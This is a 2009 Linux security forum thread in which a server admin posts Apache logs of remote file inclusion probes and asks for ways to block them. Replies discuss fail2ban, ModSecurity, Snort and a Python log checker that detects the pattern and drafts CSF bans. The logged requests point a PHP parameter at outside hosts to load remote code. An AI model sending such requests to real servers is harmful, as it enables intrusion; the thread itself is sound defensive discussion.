LinuxQuestions.org
Linux - Security This forum is for all security related questions.
Questions, tips, system compromises, firewalls, etc. are all included here.
Old 05-29-2009, 05:05 AM   #1
Bono
LQ Newbie
 
Registered: Dec 2008
Location: Croatia
Distribution: Debian Squeeze, Redhat 5
Posts: 24

Rep: Reputation: 0
iframe attack on my host


Is there any way I could block this kind of attack? They just add extra load to my server. I'm using CSF http://www.configserver.com/cp/csf.html, so if there is some tool that can check Apache logs and automatically ban IP addresses, it would be nice.

Thanks

Code:
118.105.145.13 - - [29/May/2009:01:28:23 +0200] "GET /index.php?option=http://owned-nets.blogspot.com/2009/05/pro0f3th1sddbluelinebe.html? HTTP/1.1" 200 129 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.9) Gecko/2009040821 Firefox/3.0.9"
71.113.186.235 - - [29/May/2009:01:28:55 +0200] "GET /index.php?option=http://babycaleb.fortunecity.co.uk/picture.htm? HTTP/1.1" 200 129 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
80.160.125.162 - - [29/May/2009:01:29:08 +0200] "GET /index.php?option=http://74.208.173.138:4443/index.html? HTTP/1.1" 200 129 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
80.160.125.162 - - [29/May/2009:01:29:11 +0200] "GET /index.php?option=http://211.245.23.155:2666/index.html? HTTP/1.1" 200 129 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
118.105.145.13 - - [29/May/2009:01:29:12 +0200] "GET /index.php?option=http://owned-nets.blogspot.com/2009/05/pro0f3th1sddbluelinebe.html? HTTP/1.1" 200 129 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.9) Gecko/2009040821 Firefox/3.0.9"
189.71.64.158 - - [29/May/2009:01:29:14 +0200] "GET /index.php?option=http://59.120.216.117/cmd? HTTP/1.1" 200 129 "-" "Mozilla/3.0 (compatible; Indy Library)"
74.205.212.18 - - [29/May/2009:01:29:52 +0200] "GET /index.php?option=http://211.245.23.155:2666/index.html? HTTP/1.1" 200 129 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
78.43.146.207 - - [29/May/2009:01:29:59 +0200] "GET /index.php?option=http://owned-nets.blogspot.com/2009/05/pro0f3th1sddbluelinebe.html? HTTP/1.1" 200 129 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.9) Gecko/2009040821 Firefox/3.0.9"
118.105.145.13 - - [29/May/2009:01:30:07 +0200] "GET /index.php?option=http://owned-nets.blogspot.com/2009/05/pro0f3th1sddbluelinebe.html? HTTP/1.1" 200 129 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.9) Gecko/2009040821 Firefox/3.0.9"
70.45.32.119 - - [29/May/2009:01:30:18 +0200] "GET /index.php?option=http://193.255.208.32:2082/index.html? HTTP/1.1" 200 129 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
71.113.186.235 - - [29/May/2009:01:30:38 +0200] "GET /index.php?option=http://babycaleb.fortunecity.co.uk/picture.htm? HTTP/1.1" 200 129 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
78.43.146.207 - - [29/May/2009:01:30:38 +0200] "GET /index.php?option=http://owned-nets.blogspot.com/2009/05/pro0f3th1sddbluelinebe.html? HTTP/1.1" 200 129 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.9) Gecko/2009040821 Firefox/3.0.9"
78.43.146.207 - - [29/May/2009:01:31:01 +0200] "GET /index.php?option=http://owned-nets.blogspot.com/2009/05/pro0f3th1sddbluelinebe.html? HTTP/1.1" 200 129 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.9) Gecko/2009040821 Firefox/3.0.9"
118.105.145.13 - - [29/May/2009:01:31:04 +0200] "GET /index.php?option=http://owned-nets.blogspot.com/2009/05/pro0f3th1sddbluelinebe.html? HTTP/1.1" 200 129 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.9) Gecko/2009040821 Firefox/3.0.9"
78.43.146.207 - - [29/May/2009:01:31:23 +0200] "GET /index.php?option=http://owned-nets.blogspot.com/2009/05/pro0f3th1sddbluelinebe.html? HTTP/1.1" 200 129 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.9) Gecko/2009040821 Firefox/3.0.9"
78.43.146.207 - - [29/May/2009:01:31:46 +0200] "GET /index.php?option=http://owned-nets.blogspot.com/2009/05/pro0f3th1sddbluelinebe.html? HTTP/1.1" 200 129 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.9) Gecko/2009040821 Firefox/3.0.9"
78.43.146.207 - - [29/May/2009:01:32:10 +0200] "GET /index.php?option=http://owned-nets.blogspot.com/2009/05/pro0f3th1sddbluelinebe.html? HTTP/1.1" 200 129 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.9) Gecko/2009040821 Firefox/3.0.9"
78.43.146.207 - - [29/May/2009:01:32:39 +0200] "GET /index.php?option=http://owned-nets.blogspot.com/2009/05/pro0f3th1sddbluelinebe.html? HTTP/1.1" 200 129 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.9) Gecko/2009040821 Firefox/3.0.9"
78.43.146.207 - - [29/May/2009:01:33:02 +0200] "GET /index.php?option=http://owned-nets.blogspot.com/2009/05/pro0f3th1sddbluelinebe.html? HTTP/1.1" 200 129 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.9) Gecko/2009040821 Firefox/3.0.9"
78.43.146.207 - - [29/May/2009:01:33:30 +0200] "GET /index.php?option=http://owned-nets.blogspot.com/2009/05/pro0f3th1sddbluelinebe.html? HTTP/1.1" 200 129 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.9) Gecko/2009040821 Firefox/3.0.9"
118.105.145.13 - - [29/May/2009:01:33:38 +0200] "GET /index.php?option=http://owned-nets.blogspot.com/2009/05/pro0f3th1sddbluelinebe.html? HTTP/1.1" 200 129 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.9) Gecko/2009040821 Firefox/3.0.9"
78.43.146.207 - - [29/May/2009:01:33:54 +0200] "GET /index.php?option=http://owned-nets.blogspot.com/2009/05/pro0f3th1sddbluelinebe.html? HTTP/1.1" 200 129 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.9) Gecko/2009040821 Firefox/3.0.9"
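Added example for this thread (not code from any poster, CSF or fail2ban): a small log checker of the kind the question asks for. It parses Apache combined-format lines, counts per client IP the requests whose "option" parameter carries a remote URL (the pattern in the log above), and for IPs over a threshold builds a CSF temporary-deny command whose TTL makes the ban expire on its own. The sample lines are constructed with documentation IPs, and the "csf -td ip ttl comment" form is assumed from the CSF command-line help, so check it against your version; the commands are returned, not executed.

```python
import re
from collections import Counter

# Apache combined log format, as in the excerpt posted above.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)
# An "option" parameter holding an absolute URL: the remote-inclusion probe seen in the thread.
RFI_RE = re.compile(r'[?&]option=https?://', re.IGNORECASE)

def parse_line(line):
    """Return (ip, path, status) for a combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return m.group("ip"), m.group("path"), int(m.group("status"))

def rfi_hits(lines):
    """Count, per client IP, requests whose query string tries to load a remote URL."""
    hits = Counter()
    for line in lines:
        parsed = parse_line(line)
        if parsed and RFI_RE.search(parsed[1]):
            hits[parsed[0]] += 1
    return hits

def ban_commands(hits, threshold=3, ttl_seconds=3600):
    """Build CSF temporary-deny commands for IPs at or above the threshold.
    Assumed syntax: 'csf -td IP TTL comment' (temporary deny; the TTL expires the ban).
    Returned as strings so the caller can review them before running anything."""
    return [f"csf -td {ip} {ttl_seconds} RFI-probe"
            for ip, n in sorted(hits.items()) if n >= threshold]

# Constructed sample lines (documentation IPs) mirroring the thread's log pattern.
SAMPLE_LOG = [
    '192.0.2.10 - - [29/May/2009:01:28:23 +0200] "GET /index.php?option=http://example.net/a.txt? HTTP/1.1" 200 129 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [29/May/2009:01:29:12 +0200] "GET /index.php?option=http://example.net/a.txt? HTTP/1.1" 200 129 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [29/May/2009:01:30:07 +0200] "GET /index.php?option=http://example.net/a.txt? HTTP/1.1" 200 129 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [29/May/2009:01:29:14 +0200] "GET /index.php?option=http://203.0.113.5/cmd? HTTP/1.1" 200 129 "-" "Mozilla/3.0"',
    '198.51.100.8 - - [29/May/2009:01:31:00 +0200] "GET /index.php?option=com_content&view=article HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    'garbage line that does not parse',
]

if __name__ == "__main__":
    for cmd in ban_commands(rfi_hits(SAMPLE_LOG)):
        print(cmd)
```

Feed it your real access_log (one line per list element) and raise the threshold if legitimate requests ever carry a URL in that parameter.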
 
Old 05-29-2009, 05:29 AM   #2
repo
LQ 5k Club
 
Registered: May 2001
Location: Belgium
Distribution: Linux Mint
Posts: 8,501

Rep: Reputation: 883
Take a look at fail2ban or use Apache's mod_access
 
Old 08-09-2009, 06:57 PM   #3
philip_clarke
LQ Newbie
 
Registered: Aug 2009
Posts: 4

Rep: Reputation: 0
Quote:
Originally Posted by Bono
Is there any way I could block this kind of attack? They just add extra load to my server. I'm using CSF configserver, so if there is some tool that can check Apache logs and automatically ban IP addresses, it would be nice.

Thanks
You can try 3xLock dot com from me (as a new member it will not allow me to post the URL). It's free, runs on an Apache PHP server and has a bot-blocking component. It works using mod_rewrite to block the bots with a minimal 403 response, and you can set the expiry time or manually block an IP address from your web server. It doesn't use iptables, but then the "problem" with that method is setting the expiry.

You could also use swatch, which scans the logs for specific regular expressions and can then automatically add an iptables rule to deny access (the expiry problem still applies). Also, swatch is available in RPMs for some distros, but it does take some time to set up, which mainly has to be done through trial and error.

Philip.
 
Old 08-09-2009, 07:28 PM   #4
unixfool
Member
 
Registered: May 2005
Location: Northern VA
Distribution: Slackware, Ubuntu, FreeBSD, OpenBSD, OS X
Posts: 781
Blog Entries: 8

Rep: Reputation: 157
I'm not familiar with fail2ban, but I thought that it was similar to DenyHosts (which I am familiar with). If that's the case, fail2ban won't help with this type of traffic. The best tool for the job would be Snort-inline or, better yet, ModSecurity (an application firewall).
 
Old 08-10-2009, 01:12 AM   #5
philip_clarke
LQ Newbie
 
Registered: Aug 2009
Posts: 4

Rep: Reputation: 0
Denying unwanted webtraffic from bots

Quote:
Originally Posted by unixfool
I'm not familiar with fail2ban, but I thought that it was similar to DenyHosts (which I am familiar with). If that's the case, fail2ban won't help with this type of traffic. The best tool for the job would be Snort-inline or, better yet, ModSecurity (an application firewall).
Ah, I've found ModSecurity to be a bit of a pain to configure, with too much information and too many false positives.

I always try to take into account the person with limited hosting, like those budget services (last year I made the mistake of assuming everyone, for example, had SSH ability or even access to their log files). So for the person with only web space, there's also http://php-ids.org/, which needs some PHP code included in a universal header page and assumes that the unwanted traffic is at least hitting the web server without creating a 404 (3xlock at https://www.3xlock.com at least doesn't require traffic to have a valid destination, as the bot-blocking component works using mod_rewrite in the top-level .htaccess file).

Also, if the host is using cPanel and WHM, there is an "okay" firewall built in, though it is not often turned on. It is at least dynamic, with the added advantage that it does expire blocked IP addresses.

The reason I found this thread was actually cross-referencing the URLs in a client's blocked logs with Google, and some of the traffic above is similar. Some appears to be a denial of service against a blog that publishes the IRC channels of bots, except it is hosted at Google's Blogspot, so it's a poor, ineffective attempt, unless the purpose is to get the blog banned by filling the net with repeated "click my ad" requests associated with the URL in an attempt at Google bombing.

Philip.
 
Old 08-10-2009, 02:05 AM   #6
unixfool
Member
 
Registered: May 2005
Location: Northern VA
Distribution: Slackware, Ubuntu, FreeBSD, OpenBSD, OS X
Posts: 781
Blog Entries: 8

Rep: Reputation: 157
These types of attacks have become the 'norm'... similar to CodeRed and Nimda. If you're not using PHP, you're fine. If you are, you'd definitely need to read up on the PHP sticky thread at the top of the forum. Most of these types of attacks come from sites that have been compromised. Once compromised, they attempt to find other susceptible machines to compromise. There are limited ways to block them, IMO. One of the surest ways is ModSecurity. ModSecurity is essentially an IDS/IPS. Such software requires tuning to meet your webserver's needs. It isn't a task for the meek. Before even delving into that, the requirement is that you're going to need full admin privileges to install and administer the software, which you may or may not have, depending on the hosting solution you've purchased. This isn't something you're going to be able to do using GUIs such as cPanel.

Unless someone comes up with a tool similar to fail2ban for webservers, it's going to be hard to block such activity. A few years ago, I was hosting a webserver with full admin privileges and no firewall, but a firewall is no help with webserver traffic, since most webservers require all port 80 traffic to be open and unobstructed. I had to leave port 80 open, which is why I wasn't running PHP (that was my way of mitigating the risks of using PHP... I couldn't control the unwanted traffic, so I disabled PHP). Now, I have some PHP-based apps running (even then, I limit who hits those pages), along with ModSecurity. I've yet to see it allow such attacks/scanning. If you pay attention to your logs, update your rules, and tune/disable rules that tend to block legit traffic, it's not so bad of a tool... it's no different from Snort, but some people even have issues wrapping their heads around the workload required to have a smoothly-running Snort setup.

One thing I like about running both ModSecurity and Snort is that if ModSecurity blocks traffic, it'll generate 404 statuses, for instance, which will trigger a Snort alert for each of those. I always check my Snort alerts (not so with ModSecurity alerts). When ModSecurity alerts, I almost always get a Snort alert. It may seem redundant, until you have the chance to correlate both alerts. It is then that what usually seems to be information overload turns into a goldmine of information, especially if you've configured Snort to gather as many packets as possible when an alert is triggered. And it is cool indeed to actually see something actively blocking bad traffic (and you not having to manually block such traffic 3 days later because you're worried).

YMMV!

Last edited by unixfool; 08-10-2009 at 02:10 AM.
 
Old 08-11-2009, 01:44 AM   #7
philip_clarke
LQ Newbie
 
Registered: Aug 2009
Posts: 4

Rep: Reputation: 0
Quote:
Originally Posted by unixfool
These types of attacks have become the 'norm'... similar to CodeRed and Nimda.
There's the grandfather of them all, Santy, the fastest-moving worldwide worm, which targeted phpBB, and Slacker, Lupper, can't remember the other. If in doubt, use static HTML, though my software does work well.

Quote:
Originally Posted by unixfool
Unless someone comes up with a tool similar to fail2ban for webservers,
It is very easy to do this for web servers by using some old techniques. a) Set up .htaccess to use mod_rewrite with the set of rules pointing to a "banning page". That page inserts the IP address into a database; have a daemon running in the background as root (as in, separate the nobody and root users) that iptables the IP addresses in the database and expires them after XX minutes. This does require full admin privileges because of the root daemon (as it needs iptables privs), but I could probably knock it up over the next couple of days, since I have the rulesets based on 3xLock.

The reason 3xLock doesn't do this is because it's for general people to ban access to their webservers from bots, hackers, script kiddies, when they are running as unprivileged users.

If you want to be my test monkey, I'll gladly knock up some code. If you get any false positives, you'd just need to comment out the .htaccess code.

Philip.
 
Old 08-11-2009, 01:46 AM   #8
abefroman
Senior Member
 
Registered: Feb 2004
Location: Chicago
Distribution: CentOS
Posts: 1,257

Rep: Reputation: 53
Quote:
Originally Posted by philip_clarke
Ah, I've found modsecurity to be a bit of a pain to configure with too much information and too many false positives.
I found the exact opposite with modsecurity and swear by it. I have tweaked my large ruleset so there are no false positives.
 